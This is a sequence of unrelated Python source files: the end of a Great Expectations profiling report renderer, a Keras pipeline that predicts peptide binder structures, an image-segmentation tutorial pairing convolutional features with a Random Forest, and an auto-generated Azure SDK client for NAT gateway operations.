)
]
elif isinstance(notes["content"], list):
note_content = [
RenderedMarkdownContent(
**{
"content_block_type": "markdown",
"markdown": note,
"styling": {"parent": {}},
}
)
for note in notes["content"]
]
else:
logger.warning(
"Unrecognized Expectation suite notes format. Skipping rendering."
)
else:
logger.warning(
"Unrecognized Expectation suite notes format. Skipping rendering."
)
if note_content is not None:
content += note_content
return TextContent(
**{
"content_block_type": "text",
"header": RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "Notes",
"tag": "h6",
"styling": {"classes": ["m-0"]},
},
}
),
"text": content,
"styling": {
"classes": ["col-12", "table-responsive", "mt-1"],
"body": {"classes": ["table", "table-sm"]},
},
}
)
class ProfilingResultsPageRenderer(Renderer):
def __init__(self, overview_section_renderer=None, column_section_renderer=None):
super().__init__()
if overview_section_renderer is None:
overview_section_renderer = {
"class_name": "ProfilingResultsOverviewSectionRenderer"
}
if column_section_renderer is None:
column_section_renderer = {
"class_name": "ProfilingResultsColumnSectionRenderer"
}
module_name = "great_expectations.render.renderer.profiling_results_overview_section_renderer"
self._overview_section_renderer = instantiate_class_from_config(
config=overview_section_renderer,
runtime_environment={},
config_defaults={
"module_name": overview_section_renderer.get("module_name", module_name)
},
)
if not self._overview_section_renderer:
raise ClassInstantiationError(
module_name=module_name,
package_name=None,
class_name=overview_section_renderer["class_name"],
)
module_name = "great_expectations.render.renderer.column_section_renderer"
self._column_section_renderer = instantiate_class_from_config(
config=column_section_renderer,
runtime_environment={},
config_defaults={
"module_name": column_section_renderer.get("module_name", module_name)
},
)
if not self._column_section_renderer:
raise ClassInstantiationError(
module_name=module_name,
package_name=None,
class_name=column_section_renderer["class_name"],
)
def render(self, validation_results):
run_id = validation_results.meta["run_id"]
if isinstance(run_id, str):
try:
run_time = parse(run_id).strftime("%Y-%m-%dT%H:%M:%S.%fZ")
except (ValueError, TypeError):
run_time = "__none__"
run_name = run_id
elif isinstance(run_id, dict):
run_name = run_id.get("run_name") or "__none__"
run_time = run_id.get("run_time") or "__none__"
elif isinstance(run_id, RunIdentifier):
run_name = run_id.run_name or "__none__"
run_time = run_id.run_time.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
expectation_suite_name = validation_results.meta["expectation_suite_name"]
batch_kwargs = validation_results.meta.get(
"batch_kwargs", {}
) or validation_results.meta.get("batch_spec", {})
# add datasource key to batch_kwargs if missing
if "datasource" not in batch_kwargs and "datasource" not in batch_kwargs:
# check if expectation_suite_name follows datasource.batch_kwargs_generator.data_asset_name.suite_name pattern
if len(expectation_suite_name.split(".")) == 4:
if "batch_kwargs" in validation_results.meta:
batch_kwargs["datasource"] = expectation_suite_name.split(".")[0]
else:
batch_kwargs["datasource"] = expectation_suite_name.split(".")[0]
# Group EVRs by column
# TODO: When we implement a ValidationResultSuite class, this method will move there.
columns = self._group_evrs_by_column(validation_results)
ordered_columns = Renderer._get_column_list_from_evrs(validation_results)
column_types = self._overview_section_renderer._get_column_types(
validation_results
)
data_asset_name = batch_kwargs.get("data_asset_name")
# Determine whether we have a custom run_name
try:
run_name_as_time = parse(run_name)
except ValueError:
run_name_as_time = None
try:
run_time_datetime = parse(run_time)
except ValueError:
run_time_datetime = None
include_run_name: bool = False
if run_name_as_time != run_time_datetime and run_name_as_time != "__none__":
include_run_name = True
page_title = f"Profiling Results / {str(expectation_suite_name)}"
if data_asset_name:
page_title += f" / {str(data_asset_name)}"
if include_run_name:
page_title += f" / {str(run_name)}"
page_title += f" / {str(run_time)}"
return RenderedDocumentContent(
**{
"renderer_type": "ProfilingResultsPageRenderer",
"page_title": page_title,
"expectation_suite_name": expectation_suite_name,
"utm_medium": "profiling-results-page",
"batch_kwargs": batch_kwargs
if "batch_kwargs" in validation_results.meta
else None,
"batch_spec": batch_kwargs
if "batch_spec" in validation_results.meta
else None,
"sections": [
self._overview_section_renderer.render(
validation_results, section_name="Overview"
)
]
+ [
self._column_section_renderer.render(
columns[column],
section_name=column,
column_type=column_types.get(column),
)
for column in ordered_columns
],
}
)
|
py | b4103f0e4900b89fcd4eea6f14c039e1ad491a1e | import sys,numpy as np
from modules import functions as f, transform_coords as tc
from tensorflow.keras.models import load_model
sst_dict = {'H': 0, 'E':1, 'L': 2}
dir_models = '/home/raulia/binders_nn/modules/models/'
def arr_ranges(data):
data = [f.make_ranges(data[k], 50) for k in range(len(data))]
data = [[a[k] for a in data] for k in range(len(data[0]))]
return data
def data_for_orient_func(k):
inp3 = np.zeros((k, 2))
inp3[:, 0] = 1
return [inp3]
def data_for_binder_func(k, sstr):
inp3 = np.zeros((k, 2))
inp3[:, 0] = 1
temp = np.zeros((k, 6, 3))
for idx in range(k):
for jdx in range(2, 4):
temp[idx, jdx, int(sstr[idx, jdx-2])] = 1
return [temp, inp3]
def orient_predictions_func(data, keywords, ld, ldd, model):
test_ch = arr_ranges(data)
y_pred = [model.predict(i, verbose=0) for i in test_ch]
y_pred = np.vstack(y_pred)
pred_order = np.fliplr(np.argsort(y_pred, axis=1))
pred_order = [[[i,y_pred[jx, i]] for i in j] for jx, j in enumerate(pred_order)]
pred_order = [[[x[0] // 6, x[0] % 6, x[1]] for x in j] for j in pred_order]
pos_thr = 0.01 if 'pos_thr' not in keywords else float(keywords['pos_thr'])
pred_order = [[x for x in a if x[2] > pos_thr] for a in pred_order]
if ld[0] is not None:
pred_order = [[x for x in a if x[0] in ld[0]] for a in pred_order]
if ld[1] is not None:
pred_order = [[x for x in a if x[1] in ld[1]] for a in pred_order]
#print(pred_order)
if (ld[0] is None) and (ld[1] is None):
#print(ld, ldd)
if ldd[0] is not None:
pred_order = [[x for x in a if x[0] not in ldd[0]] for a in pred_order]
if ldd[1] is not None:
pred_order = [[x for x in a if x[1] in ldd[1]] for a in pred_order]
max_pos = 1 if 'max_pos' not in keywords else int(keywords['max_pos'])
pred_order = [i[:max_pos] for i in pred_order]
print(pred_order)
return pred_order
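# Added comment: orient_predictions_func returns, for each input example, a list of up
# to `max_pos` candidates of the form [index // 6, index % 6, probability], where
# `index` is a flat position in the Orn model output. Candidates below pos_thr are
# dropped, and the optional ld / ldd allow/deny lists from the second input file
# further restrict the two decoded indices. (The physical meaning of the two indices
# is an assumption inferred from the decoding, not stated in the script.)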
def sstr_predictions_func(data, keywords, model):
#print([i.shape for i in data])
test_ch = arr_ranges(data)
y_pred = [model.predict(i, verbose=0) for i in test_ch]
y_pred = np.vstack(y_pred)
pred_order = np.fliplr(np.argsort(y_pred, axis=1))
pred_order = [[[i,y_pred[jx, i]] for i in j if y_pred[jx, i]] for jx, j in enumerate(pred_order)]
pred_order = [[[x[0] // 3, x[0] % 3, x[1]] for x in j] for j in pred_order]
sst_thr = 0.01 if 'sst_thr' not in keywords else float(keywords['sst_thr'])
pred_order = [[x for x in a if x[2] > sst_thr] for a in pred_order]
if ('sst_type' in keywords):
sst_type = [sst_dict[a.strip()] for a in keywords['sst_type'].split(',')]
pred_order = [[x for x in a if len([j for j in x[:2] if j in sst_type]) == 2] for a in pred_order]
#else
max_sst = 1 if 'max_sst' not in keywords else int(keywords['max_sst'])
pred_order = [i[:max_sst] for i in pred_order]
return pred_order
def binders_predictions_func(data, o, s, model):
o, s = [str(np.round(int(i[-1]*100))) for i in o], [str(np.round(int(i[-1]*100))) for i in s]
test_ch = arr_ranges(data)
y_pred = [model.predict(i, verbose=0) for i in test_ch]
y_pred = np.vstack(y_pred)
return [y_pred, o, s]
def make_binders(data, data2, keywords):
model_pos = load_model(dir_models + 'Orn.hdf5')
model_sst = load_model(dir_models + 'SecS.hdf5')
model_bb = load_model(dir_models + 'PepBB.hdf5')
swap = 'False'
if ('swap_pose' in keywords) and (keywords['swap_pose'] == 'True'):
swap = 'True'
pdb_data_all = []
binder_files = []
data = f.readjson(data)
data2 = f.readjson(data2)
p_geom, p_sec, p_amn, p_mask, name = [np.array(data[x]) for x in ['p_xyz1', 'sec1', 'p_amn1', 'mask', 'name']]
data_for_orient_n = data_for_orient_func(len(name))
orients = orient_predictions_func([p_geom, p_sec, p_amn, p_mask] + data_for_orient_n, keywords, data2[0]['ld'], data2[0]['ldd'], model_pos)
num_orient = max([len(i) for i in orients])
for ornt in range(num_orient):
idx = [idx for idx in range(len(orients)) if len(orients[idx]) > ornt]
p_geom_idx, p_sec_idx, p_amn_idx, p_mask_idx, name_idx = [a[idx] for a in [p_geom, p_sec, p_amn, p_mask, name]]
ornt_idx = np.array([o[ornt] for ox, o in enumerate(orients) if ox in idx])[:, :2]
data_for_sstr_n = data_for_orient_func(len(name_idx))
sstrs = sstr_predictions_func([p_geom_idx, p_sec_idx, p_amn_idx, p_mask_idx, ornt_idx] + data_for_sstr_n, keywords, model_sst)
num_sstr = max([len(i) for i in sstrs])
for sstr in range(num_sstr):
jdx = [idx for idx in range(len(sstrs)) if len(sstrs[idx]) > sstr]
p_geom_jdx, p_sec_jdx, p_amn_jdx, p_mask_jdx, name_jdx = [a[jdx] for a in [p_geom_idx, p_sec_idx, p_amn_idx, p_mask_idx, name_idx]]
p_ld_jdx = ornt_idx[jdx]
sstr_jdx = np.array([s[sstr] for sx, s in enumerate(sstrs) if sx in jdx])[:, :2]
data_for_binder_n = data_for_binder_func(len(name_jdx), sstr_jdx)
binders_data = binders_predictions_func([p_geom_jdx, p_sec_jdx, p_amn_jdx, p_mask_jdx, p_ld_jdx] + data_for_binder_n, ornt_idx, sstr_jdx, model_bb)
pdb_data = tc.calculate_rmsd(binders_data, data2, name_jdx, [str(ornt), str(sstr)], sstr_jdx.tolist(), keywords['prefix'], swap)
pdb_data_all += pdb_data
#print(pdb_data_all)
return pdb_data_all
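# Added comment: make_binders chains three pretrained models loaded from dir_models:
# Orn.hdf5 proposes placements (orient_predictions_func), SecS.hdf5 proposes
# secondary-structure pairs for each placement (sstr_predictions_func, classes H/E/L
# per sst_dict), and PepBB.hdf5 predicts the binder backbone, which is then turned
# into coordinates/PDB records by tc.calculate_rmsd. This summary is inferred from
# the model file names and the call order in this script.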
def make_binders_E(data, data2, keywords, e, c_names = None):
nbem = 1
swap = 'False'
if ('swap_pose' in keywords) and (keywords['swap_pose'] == 'True'):
swap = 'True'
if ('num_pepbbe_m' in keywords) and (int(keywords['num_pepbbe_m']) in [1, 3]):
nbem = int(keywords['num_pepbbe_m'])
if e == 1:
model_pos = load_model(dir_models + 'Orn_C.hdf5')
model_sst = load_model(dir_models + 'SecS_C.hdf5')
model_bb = [load_model(dir_models + 'PepBB_C' + str(k) + '.hdf5') for k in range(1,nbem+1)]
elif (e == 0) or (e==10):
model_pos = load_model(dir_models + 'Orn_N.hdf5')
model_sst = load_model(dir_models + 'SecS_N.hdf5')
model_bb = [load_model(dir_models + 'PepBB_N' + str(k) + '.hdf5') for k in range(1,nbem+1)]
p_geom, p_sec, p_amn, p_mask, name, name_b, l_geom = data
pdb_data_all = []
binder_files = []
data2 = f.readjson(data2)
data_for_orient_n = data_for_orient_func(len(name))
orients = orient_predictions_func([p_geom, p_sec, p_amn, p_mask] + data_for_orient_n + [l_geom], keywords, data2[0]['ld'], data2[0]['ldd'], model_pos)
num_orient = max([len(i) for i in orients])
for ornt in range(num_orient):
idx = [idx for idx in range(len(orients)) if len(orients[idx]) > ornt]
p_geom_idx, p_sec_idx, p_amn_idx, p_mask_idx, name_idx, name_b_idx, l_geom_idx = [a[idx] for a in [p_geom, p_sec, p_amn, p_mask, name, name_b, l_geom]]
ornt_idx = np.array([o[ornt] for ox, o in enumerate(orients) if ox in idx])[:, :2]
data_for_sstr_n = data_for_orient_func(len(name_idx))
sstrs = sstr_predictions_func([p_geom_idx, p_sec_idx, p_amn_idx, p_mask_idx, ornt_idx] + data_for_sstr_n + [l_geom_idx], keywords, model_sst)
num_sstr = max([len(i) for i in sstrs])
for sstr in range(num_sstr):
for mm in range(len(model_bb)):
jdx = [idx for idx in range(len(sstrs)) if len(sstrs[idx]) > sstr]
p_geom_jdx, p_sec_jdx, p_amn_jdx, p_mask_jdx, name_jdx, name_b_jdx, l_geom_jdx = [a[jdx] for a in [p_geom_idx, p_sec_idx, p_amn_idx, p_mask_idx, name_idx, name_b_idx, l_geom_idx]]
p_ld_jdx = ornt_idx[jdx]
sstr_jdx = np.array([s[sstr] for sx, s in enumerate(sstrs) if sx in jdx])[:, :2]
data_for_binder_n = data_for_binder_func(len(name_jdx), sstr_jdx)
binders_data = binders_predictions_func([p_geom_jdx, p_sec_jdx, p_amn_jdx, p_mask_jdx, p_ld_jdx] + data_for_binder_n + [l_geom_jdx[:,:,:,[0,1,2,4]]], ornt_idx, sstr_jdx, model_bb[mm])
pdb_data = tc.calculate_rmsde(binders_data, data2, name_jdx, name_b_jdx, [str(ornt), str(sstr), str(mm)], sstr_jdx.tolist(), keywords['prefix'], e, swap, c_names)
pdb_data_all += pdb_data
return pdb_data_all
def make_binders_end(data, data2, keywords):
def get_e_data(data, e):
idx = np.where(np.array(data['b_end']) == e)[0]
data = [np.array([a for ax, a in enumerate(data[x]) if ax in idx]) for x in data if x != 'b_end']
return data
data = f.readjson(data)
pdb_names_all = []
if 'binder_end' in keywords:
if keywords['binder_end'] == 'C':
data_C = get_e_data(data, 1)
pdb_names = make_binders_E(data_C, data2, keywords, 1)
elif keywords['binder_end'] == 'N':
data_N = get_e_data(data, 0)
pdb_names = make_binders_E(data_N, data2, keywords, 0)
else:
data_C = get_e_data(data, 1)
pdb_names = make_binders_E(data_C, data2, keywords, 1)
data_N = get_e_data(data, 0)
pdb_names = make_binders_E(data_N, data2, keywords, 10, pdb_names)
pdb_names_all += pdb_names
return pdb_names
input_file = sys.argv[1]
keywords = f.keywords(input_file)
prefix = keywords['prefix']
data = prefix + '/' + prefix + '_b.json'
data2 = prefix + '/' + prefix + '_2b.json'
if 'add_residues' in keywords:
pdb_names = make_binders_end(data, data2, keywords)
else:
pdb_names = make_binders(data, data2, keywords)
print(pdb_names)
f.writejson(prefix + '/' + prefix + '_names.json', pdb_names)
|
py | b4104046aa6b0f84c1f446ec0fe22f2a20ca8e3d | #Ref: Sreenivas Sarwar Anik
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import glob
import cv2
import pickle
from keras.models import Sequential
from keras.layers import Conv2D
import os
print(os.listdir("images/"))
SIZE = 512 #Resize images
train_images = []
for directory_path in glob.glob("images/train_images"):
for img_path in glob.glob(os.path.join(directory_path, "*.tif")):
img = cv2.imread(img_path, cv2.IMREAD_COLOR)
img = cv2.resize(img, (SIZE, SIZE))
img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
train_images.append(img)
#train_labels.append(label)
train_images = np.array(train_images)
train_masks = []
for directory_path in glob.glob("images/train_masks"):
for mask_path in glob.glob(os.path.join(directory_path, "*.tif")):
mask = cv2.imread(mask_path, 0)
mask = cv2.resize(mask, (SIZE, SIZE))
#mask = cv2.cvtColor(mask, cv2.COLOR_RGB2BGR)
train_masks.append(mask)
#train_labels.append(label)
train_masks = np.array(train_masks)
X_train = train_images
y_train = train_masks
y_train = np.expand_dims(y_train, axis=3)
activation = 'sigmoid'
feature_extractor = Sequential()
feature_extractor.add(Conv2D(32, 3, activation = activation, padding = 'same', input_shape = (SIZE, SIZE, 3)))
feature_extractor.add(Conv2D(32, 3, activation = activation, padding = 'same', kernel_initializer = 'he_uniform'))
#feature_extractor.add(Conv2D(64, 3, activation = activation, padding = 'same', kernel_initializer = 'he_uniform'))
#feature_extractor.add(BatchNormalization())
#
#feature_extractor.add(Conv2D(64, 3, activation = activation, padding = 'same', kernel_initializer = 'he_uniform'))
#feature_extractor.add(BatchNormalization())
#feature_extractor.add(MaxPooling2D())
#feature_extractor.add(Flatten())
X = feature_extractor.predict(X_train)
X = X.reshape(-1, X.shape[3])
Y = y_train.reshape(-1)
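# Added comment: feature_extractor.predict returns per-pixel conv features of shape
# (num_images, SIZE, SIZE, 32); reshaping to (-1, 32) and flattening the masks to a
# matching 1-D label vector turns semantic segmentation into an ordinary per-pixel
# classification problem that the Random Forest below can train on.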
dataset = pd.DataFrame(X)
dataset['Label'] = Y
print(dataset['Label'].unique())
print(dataset['Label'].value_counts())
##If we do not want to include pixels with value 0
##e.g. Sometimes unlabeled pixels may be given a value 0.
dataset = dataset[dataset['Label'] != 0]
X_for_RF = dataset.drop(labels = ['Label'], axis=1)
Y_for_RF = dataset['Label']
#RANDOM FOREST
from sklearn.ensemble import RandomForestClassifier
model = RandomForestClassifier(n_estimators = 50, random_state = 42)
# Train the model on training data
# Ravel Y to pass 1d array instead of column vector
model.fit(X_for_RF, Y_for_RF) #For sklearn no one hot encoding
filename = 'RF_model.sav'
pickle.dump(model, open(filename, 'wb'))
loaded_model = pickle.load(open(filename, 'rb'))
#READ EXTERNAL IMAGE...
test_img = cv2.imread('images/test_images/Sandstone_Versa0360.tif', cv2.IMREAD_COLOR)
test_img = cv2.resize(test_img, (SIZE, SIZE))
test_img = cv2.cvtColor(test_img, cv2.COLOR_RGB2BGR)
test_img = np.expand_dims(test_img, axis=0)
#predict_image = np.expand_dims(X_train[8,:,:,:], axis=0)
X_test_feature = feature_extractor.predict(test_img)
X_test_feature = X_test_feature.reshape(-1, X_test_feature.shape[3])
prediction = loaded_model.predict(X_test_feature)
prediction_image = prediction.reshape((SIZE, SIZE))  # reshape flat per-pixel predictions back to image size
plt.imshow(prediction_image, cmap='gray')
|
py | b4104056ea8bddb93ec175ded6261409b0bee1c1 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class NatGatewaysOperations(object):
"""NatGatewaysOperations operations.
You should not instantiate directly this class, but create a Client instance that will create it for you and attach it as attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client API version. Constant value: "2020-04-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2020-04-01"
self.config = config
def _delete_initial(
self, resource_group_name, nat_gateway_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'natGatewayName': self._serialize.url("nat_gateway_name", nat_gateway_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, resource_group_name, nat_gateway_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes the specified nat gateway.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param nat_gateway_name: The name of the nat gateway.
:type nat_gateway_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
nat_gateway_name=nat_gateway_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/natGateways/{natGatewayName}'}
def get(
self, resource_group_name, nat_gateway_name, expand=None, custom_headers=None, raw=False, **operation_config):
"""Gets the specified nat gateway in a specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param nat_gateway_name: The name of the nat gateway.
:type nat_gateway_name: str
:param expand: Expands referenced resources.
:type expand: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: NatGateway or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.network.v2020_04_01.models.NatGateway or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'natGatewayName': self._serialize.url("nat_gateway_name", nat_gateway_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('NatGateway', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/natGateways/{natGatewayName}'}
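    # Hedged usage sketch (added comment): with an azure-mgmt-network management
    # client (e.g. NetworkManagementClient) that exposes this operations class,
    #     nat_gw = network_client.nat_gateways.get('my-rg', 'my-nat-gateway')
    # returns a deserialized NatGateway model. Resource names here are placeholders.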
def _create_or_update_initial(
self, resource_group_name, nat_gateway_name, parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'natGatewayName': self._serialize.url("nat_gateway_name", nat_gateway_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'NatGateway')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 201, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('NatGateway', response)
if response.status_code == 201:
deserialized = self._deserialize('NatGateway', response)
if response.status_code == 202:
deserialized = self._deserialize('NatGateway', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, nat_gateway_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Creates or updates a nat gateway.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param nat_gateway_name: The name of the nat gateway.
:type nat_gateway_name: str
:param parameters: Parameters supplied to the create or update nat
gateway operation.
:type parameters: ~azure.mgmt.network.v2020_04_01.models.NatGateway
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns NatGateway or
ClientRawResponse<NatGateway> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2020_04_01.models.NatGateway]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2020_04_01.models.NatGateway]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
nat_gateway_name=nat_gateway_name,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('NatGateway', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/natGateways/{natGatewayName}'}
def update_tags(
self, resource_group_name, nat_gateway_name, tags=None, custom_headers=None, raw=False, **operation_config):
"""Updates nat gateway tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param nat_gateway_name: The name of the nat gateway.
:type nat_gateway_name: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: NatGateway or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.network.v2020_04_01.models.NatGateway or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
parameters = models.TagsObject(tags=tags)
# Construct URL
url = self.update_tags.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'natGatewayName': self._serialize.url("nat_gateway_name", nat_gateway_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'TagsObject')
# Construct and send request
request = self._client.patch(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('NatGateway', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/natGateways/{natGatewayName}'}
def list_all(
self, custom_headers=None, raw=False, **operation_config):
"""Gets all the Nat Gateways in a subscription.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of NatGateway
:rtype:
~azure.mgmt.network.v2020_04_01.models.NatGatewayPaged[~azure.mgmt.network.v2020_04_01.models.NatGateway]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_all.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
